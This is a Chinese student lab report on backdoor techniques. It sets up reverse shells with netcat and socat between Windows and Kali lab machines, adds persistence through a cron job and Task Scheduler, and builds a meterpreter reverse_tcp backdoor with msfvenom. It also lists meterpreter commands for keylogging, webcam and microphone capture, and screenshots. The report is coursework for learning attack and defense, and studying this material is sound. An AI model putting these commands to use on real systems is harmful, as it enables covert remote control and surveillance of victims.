20145237《网络对抗》Exp2 后门原理与实践

Windows获得Linux Shell

在Windows下，先使用ipconfig指令查看本机IP：

输入ncat.exe -l -p 5237使用ncat.exe程序监听本机的5237端口：

在Kali环境下，使用nc指令的-e选项反向连接Windows主机的5237端口：

Windows下成功获得了一个Kali的shell，运行ls指令如下：

Linux获得Windows Shell

过程与之前的类似，在Kali环境下用ifconfig查看IP：

使用nc -l -p 5237指令监听5237端口：

在Windows下，输入ncat.exe -e cmd.exe 192.168.35.128 5237使用ncat.exe程序的-e选项项反向连接Kali主机的5237端口：

Kali下可以看到Windows的命令提示，可以输入Windows命令：

使用netcat获取主机操作Shell，cron启动

实验内容
先在Windows系统下，用`ncat.exe -l -p 5237，监听5237端口

用crontab -e指令编辑一条定时任务(输入3，选vim.basic)

在最后一行添加30 * * * * /bin/netcat 192.168.1.200 5237 -e /bin/sh，意思是在每个小时的第30分钟反向连接Windows主机的5237端口(设置成30的原因是我当时的时间是28分)：

使用socat获取主机操作Shell, 任务计划启动

使用socat获取主机操作Shell, 任务计划启动

实践过程

在Windows系统下，打开控制面板->管理工具->任务计划程序，创建任务，填写任务名称后，新建一个触发器：

在操作->程序或脚本中选择你socat.exe文件的路径，在添加参数一栏填写tcp-listen:5237 exec:cmd.exe,pty,stderr，这个命令的作用是把cmd.exe绑定到端口5237，同时把cmd.exe的stderr重定向到stdout上：

创建完成之后，按Windows+L快捷键锁定计算机，再次打开时，可以发现之前创建的任务已经开始运行：

此时，在Kali环境下输入指令socat - tcp:192.168.1.200:5237，这里的第一个参数-代表标准的输入输出，第二个流连接到Windows主机的5237端口，此时可以发现已经成功获得了一个cmd shell：

使用MSF meterpreter生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell

输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.86.129 LPORT=5237 -f exe > 20145237_backdoor.exe生成后门程序：

通过nc指令将生成的后门程序传送到Windows主机上：
windows：ncat.exe -l 5237 > 20145237.exe

kali：nc 192.168.1.100 5237 < 20145237.exe

在Kali上使用msfconsole指令进入msf控制台，set payload windows/meterpreter/reverse_tcp，使用监听模块，设置payload，设置反弹回连的IP和端口

设置完成后，执行监听：

打开Windows上的后门程序：

此时Kali上已经获得了Windows主机的连接，并且得到了远程控制的shell：

使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权

使用record_mic指令可以截获一段音频：

使用webcam_snap指令可以使用摄像头进行拍照：

使用webcam stream指令可以使用摄像头进行录像：

使用screenshot指令可以进行截屏：

使用keyscan_start指令开始记录下击键的过程，使用keyscan_dump指令读取击键的记录：